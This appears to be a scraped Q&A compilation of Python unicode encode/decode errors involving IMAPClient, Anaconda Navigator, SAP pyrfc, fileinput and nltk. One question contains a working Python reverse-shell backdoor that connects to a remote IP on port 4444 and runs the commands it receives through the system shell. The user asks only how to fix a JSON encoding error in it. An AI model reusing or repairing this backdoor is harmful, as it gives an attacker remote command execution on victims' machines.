Python IMAPClient/imaplib search unicode issue - python

I'm using the IMAPClient library, but I'm getting UnicodeEncodeError when doing a search. Below is a snippet and the stack trace:
imap_client = imapclient.IMAPClient('imap.gmail.com', use_uid=True, ssl=True)
imap_client.oauth2_login('john#example.com', 'xxx')
subject = u'Test \u0153\u2211\u00b4\u00e5\u00df\u2202'
from_email = u'john#example.com'
to_emails = [u'foo#example.com']
cc_emails = []
approx_date_sent = '05-Aug-2013'
imap_client.select_folder(r'\Sent')
search_criteria = [
u'FROM %s' % from_email,
u'SUBJECT %s'.encode('utf-8') % subject,
u'TO %s' % ';'.join(to_emails) or '',
u'CC %s' % ';'.join(cc_emails) or '',
u'SENTON %s' % approx_date_sent
]
msg_ids = imap_client.search(search_criteria, charset='utf-8')
'ascii' codec can't encode characters in position 77-82: ordinal not in range(128)
Traceback (most recent call last):
File "/base/data/home/runtimes/python27/python27_lib/versions/third_party/webapp2-2.5.1/webapp2.py", line 570, in dispatch
return method(*args, **kwargs)
File "/base/data/home/apps/s~app/dev.369284735686497536/imapapi.py", line 269, in post
to_emails=to_emails, cc_emails=cc_emails, approx_date_sent=approx_date_sent
File "/base/data/home/apps/s~app/dev.369284735686497536/utils/imap.py", line 123, in search_message
msg_ids = imap_client.search(search_criteria, charset='utf-8')
File "/base/data/home/apps/s~app/dev.369284735686497536/imapclient/imapclient.py", line 569, in search
typ, data = self._imap.search(charset, *criteria)
File "/base/data/home/runtimes/python27/python27_dist/lib/python2.7/imaplib.py", line 625, in search
typ, dat = self._simple_command(name, 'CHARSET', charset, *criteria)
File "/base/data/home/runtimes/python27/python27_dist/lib/python2.7/imaplib.py", line 1070, in _simple_command
return self._command_complete(name, self._command(name, *args))
File "/base/data/home/runtimes/python27/python27_dist/lib/python2.7/imaplib.py", line 857, in _command
self.send('%s%s' % (data, CRLF))
File "/base/data/home/runtimes/python27/python27_dist/lib/python2.7/imaplib.py", line 1178, in send
sent = self.sslobj.write(data)
File "/base/data/home/runtimes/python27/python27_dist/lib/python2.7/ssl.py", line 232, in write
return self._sslobj.write(data)
UnicodeEncodeError: 'ascii' codec can't encode characters in position 77-82: ordinal not in range(128)
It seems the issue happens in ssl.py? And ssl=True is needed for oauth2_login.

Try this out
Python IMAP search using a subject encoded with iso-8859-1
It covers utf-8 as well as iso-8859-1

Related

anaconda navigator stuck on loading applications

(base) C:\Windows\System32>anaconda-navigator
2022-10-25 21:01:52,124 - ERROR init.global_exception_logger:19
'utf-8' codec can't decode byte 0xbb in position 0: invalid start byte
Traceback (most recent call last):
File "D:\anaconda3\lib\site-packages\anaconda_navigator\widgets\main_window_init_.py", line 497, in setup
self.post_setup(conda_data=output)
File "D:\anaconda3\lib\site-packages\anaconda_navigator\widgets\main_window_init_.py", line 525, in post_setup
self.tab_home.setup(conda_data)
File "D:\anaconda3\lib\site-packages\anaconda_navigator\widgets\tabs\home.py", line 253, in setup
self.update_applications()
File "D:\anaconda3\lib\site-packages\anaconda_navigator\widgets\tabs\home.py", line 292, in update_applications
self.api.process_apps(self._applications, prefix=self.current_prefix).values(),
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\anaconda_api.py", line 561, in process_apps
collected_applications: external_apps.ApplicationCollection = external_apps.get_applications(
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps_init.py", line 49, in get_applications
apps: typing.Sequence[typing.Union[BaseApp, AppPatch]] = config_utils.load_configuration(context=context)
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\config_utils.py", line 217, in load_configuration
return apply_configuration(
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\config_utils.py", line 198, in apply_configuration
addition: typing.Union[None, base.BaseApp, base.AppPatch] = base.BaseApp.parse_configuration(
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\base.py", line 233, in parse_configuration
return target_cls._parse_configuration( # pylint: disable=protected-access
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\base.py", line 458, in _parse_configuration
result: BaseInstallableApp = BaseInstallableApp(
File "", line 17, in init
self.attrs_post_init()
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\base.py", line 378, in attrs_post_init
for location in self._detector(context=context):
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\bundle\vscode_utils.py", line 58, in call
stdout, _, _ = conda_launch_utils.run_process([application.executable, '--version'])
File "D:\anaconda3\lib\site-packages\anaconda_navigator\utils\conda\launch.py", line 45, in run_process
stdout = ansi_utlils.escape_ansi(raw_stdout.decode())
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xbb in position 0: invalid start byte
can anyone help me to solve this issue?

i can't solve the problem when transferring a json object

I am successfully establishing a connection, but if I use json to transfer data, there is a problem. I need json to transfer large amounts of data
import json
import socket
import subprocess
class Reverce_Backdoor:
def __init__(self, ip, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)
def reliable_receive(self):
json_data = self.connection.recv(1024)
return json.loads(json_data)
def execute_system_command(self, command):
return subprocess.check_output(command.encode('utf-8'), shell=True)
def run(self):
while True:
command = self.reliable_receive()
command_result = self.execute_system_command(command.encode('utf-8'))
self.reliable_send(command_result)
connection.close()
my_backdoor = Reverce_Backdoor("192.168.3.5", 4444)
my_backdoor.run()
I get an error :
C:\Python27\python.exe C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py
Traceback (most recent call last):
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 31, in <module>
my_backdoor.run()
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 26, in run
self.reliable_send(command_result)
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 12, in reliable_send
json_data = json.dumps(data)
File "C:\Python27\lib\json\__init__.py", line 231, in dumps
return _default_encoder.encode(obj)
File "C:\Python27\lib\json\encoder.py", line 195, in encode
return encode_basestring_ascii(o)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x92 in position 1: invalid start byte
but this code works. the functionality is the same.
https://github.com/Oleg9637/Python
can anyone help?
Even if I do:
def run(self):
while True:
command = self.reliable_receive()
command_result = self.execute_system_command(command)
print (command_result)
self.reliable_send(command_result)
connection.close()
I get:
Traceback (most recent call last):
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 32, in <module>
my_backdoor.run()
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 27, in run
self.reliable_send(command_result)
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 12, in reliable_send
json_data = json.dumps(data)
File "C:\Python27\lib\json\__init__.py", line 231, in dumps
return _default_encoder.encode(obj)
File "C:\Python27\lib\json\encoder.py", line 195, in encode
return encode_basestring_ascii(o)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x92 in position 1: invalid start byte
the connection is established, the command is transmitted correctly, but something goes wrong

SAP UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 2-3: unexpected end of data while calling RFC_READ_TABLE

I have followed all process of (https://blogs.sap.com/2020/06/09/connecting-python-with-sap-step-by-step-guide/) and able to establish the successful connection to the SAP server but at line conn.call method I am getting this:
Traceback (most recent call last):
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python38\sap.py", line 22, in
result = conn.call('RFC_READ_TABLE', QUERY_TABLE = 'TCURR', OPTIONS = options, ROWSKIPS = rowskips, ROWCOUNT = ROWS_AT_A_TIME)
File "src\pyrfc_pyrfc.pyx", line 423, in pyrfc._pyrfc.Connection.call
File "src\pyrfc_pyrfc.pyx", line 2021, in pyrfc._pyrfc.wrapResult
File "src\pyrfc_pyrfc.pyx", line 2100, in pyrfc._pyrfc.wrapVariable
File "src\pyrfc_pyrfc.pyx", line 2070, in pyrfc._pyrfc.wrapTable
File "src\pyrfc_pyrfc.pyx", line 2039, in pyrfc._pyrfc.wrapStructure
File "src\pyrfc_pyrfc.pyx", line 2285, in pyrfc._pyrfc.wrapString
UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 2-3: unexpected end of data
Versions:
os-windows 10
python version - 3.8.6
sap sdk - PL 7
pyrfc release - pyrfc-2.0.0-cp38-cp38-win_amd64
Code:
from pyrfc import Connection, ABAPApplicationError, ABAPRuntimeError, LogonError, CommunicationError
from configparser import ConfigParser
from pprint import PrettyPrinter
ASHOST='sapxxxxx'
CLIENT='x00'
SYSNR='00'
USER='XXXXXXXX'
PASSWD='XXXXXXXX'
conn = Connection(ashost=ASHOST, sysnr=SYSNR, client=CLIENT, user=USER, passwd=PASSWD)
try:
options = [{ 'TEXT': "FCURR = 'USD'"}]
pp = PrettyPrinter(indent=4)
ROWS_AT_A_TIME = 10
rowskips = 0
while True:
print("----Begin of Batch---")
result = conn.call('RFC_READ_TABLE', \
QUERY_TABLE = 'TCURR', \
OPTIONS = options, \
ROWSKIPS = rowskips, ROWCOUNT = ROWS_AT_A_TIME)
pp.pprint(result['DATA'])
rowskips += ROWS_AT_A_TIME
if len(result['DATA']) < ROWS_AT_A_TIME:
break
except CommunicationError:
print("Could not connect to server.")
raise
except LogonError:
print("Could not log in. Wrong credentials?")
raise
except (ABAPApplicationError, ABAPRuntimeError):
print("An error occurred.")
raise
> Traceback (most recent call last): <br>
> File "C:\Users\Administrator\AppData\Local\Programs\Python\Python38\sap.py", line 22, in <be>
> ----Begin of Batch---
> `result = conn.call('RFC_READ_TABLE', QUERY_TABLE = 'TCURR', OPTIONS = options, ROWSKIPS = rowskips, ROWCOUNT = ROWS_AT_A_TIME)` <br>
> File "src\pyrfc_pyrfc.pyx", line 423, in pyrfc._pyrfc.Connection.call <br>
> File "src\pyrfc_pyrfc.pyx", line 2021, in pyrfc._pyrfc.wrapResult <br>
> File "src\pyrfc_pyrfc.pyx", line 2100, in pyrfc._pyrfc.wrapVariable <br>
> File "src\pyrfc_pyrfc.pyx", line 2070, in pyrfc._pyrfc.wrapTable <br>
> File "src\pyrfc_pyrfc.pyx", line 2039, in pyrfc._pyrfc.wrapStructure <br>
> File "src\pyrfc_pyrfc.pyx", line 2285, in pyrfc._pyrfc.wrapString <br>
> UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 2-3: unexpected end of data <br>

UnicodeDecodeError from piping .txt file with cat

I am using cat test.txt | and piping the lines of that file into my python program. However, I am getting a UnicodeDecodeError:
Traceback
Traceback (most recent call last):
File "/home/sys_bio_ctgdq/sthe-admin/python3.5/lib/python3.5/runpy.py", line 170, in _run_module_as_main
"__main__", mod_spec)
File "/home/sys_bio_ctgdq/sthe-admin/python3.5/lib/python3.5/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/nfsdata/DSCluster/home/bli1/qe-trinity-functional/qe/trinity/hdfs2datacase.py", line 102, in <module>
sys.exit(main(sys.argv))
File "/nfsdata/DSCluster/home/bli1/qe-trinity-functional/qe/trinity/hdfs2datacase.py", line 72, in main
for rawline in fileinput.input(args.targets):
File "/home/sys_bio_ctgdq/sthe-admin/python3.5/lib/python3.5/fileinput.py", line 265, in __next__
line = self.readline()
File "/home/sys_bio_ctgdq/sthe-admin/python3.5/lib/python3.5/fileinput.py", line 370, in readline
self._buffer = self._file.readlines(self._bufsize)
File "/tmp/python3_bli1/lib/python3.5/codecs.py", line 321, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xae in position 1971: invalid start byte
Line 72 is the for loop line
Here is how I handle the input stream:
for rawline in fileinput.input(args.targets, openhook=fileinput.hook_encoded("utf-8")):
try:
jobj = json.loads(rawline)
except ValueError as e:
log.warn("invalid json on input line %d", line_count)
except UnicodeDecodeError as e:
log.warn("Funky characters", line_count)
else:
if case_obj is not None:
case_str = json.dumps(case_obj, sort_keys=True, indent=4)
if first_case:
print("[")
first_case = False
else:
print(",")
print(case_str)
finally:
pass

Strange behaviour with nltk sentence tokenizer and special characters

I get some strange behavior when using the sent_tokenizer for German text.
Example Code:
sent_tokenizer = nltk.data.load('tokenizers/punkt/german.pickle')
for sent in sent_tokenizer.tokenize("Super Qualität. Tolles Teil.")
print sent
This fails with the error:
Traceback (most recent call last):
for sent in sent_tokenize("Super Qualität. Tolles Teil."):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/__init__.py", line 82, in sent_tokenize
return tokenizer.tokenize(text)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1270, in tokenize
return list(self.sentences_from_text(text, realign_boundaries))
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1318, in sentences_from_text
return [text[s:e] for s, e in self.span_tokenize(text, realign_boundaries)]
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1309, in span_tokenize
return [(sl.start, sl.stop) for sl in slices]
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1348, in _realign_boundaries
for sl1, sl2 in _pair_iter(slices):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 354, in _pair_iter
prev = next(it)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1324, in _slices_from_text
if self.text_contains_sentbreak(context):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1369, in text_contains_sentbreak
for t in self._annotate_tokens(self._tokenize_words(text)):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1504, in _annotate_second_pass
for t1, t2 in _pair_iter(tokens):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 354, in _pair_iter
prev = next(it)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 621, in _annotate_first_pass
for aug_tok in tokens:
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 586, in _tokenize_words
for line in plaintext.split('\n'):
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 6: ordinal not in range(128)
whereas:
sent_tokenizer = nltk.data.load('tokenizers/punkt/german.pickle')
for sent in sent_tokenizer.tokenize("Super Qualität des Produktes. Tolles Teil.")
print sent
works perfectly
I found the solution on the nltk homepage.
Caution: when tokenizing a Unicode string, make sure you are not using
an encoded version of the string (it may be necessary to decode it
first, e.g. with s.decode("utf8").
So
text = "Super Qualität. Tolles Teil."
sent_tokenizer = nltk.data.load('tokenizers/punkt/german.pickle')
for sent in sent_tokenizer.tokenize(text.decode('utf8')):
print sent
works like a charm.

Categories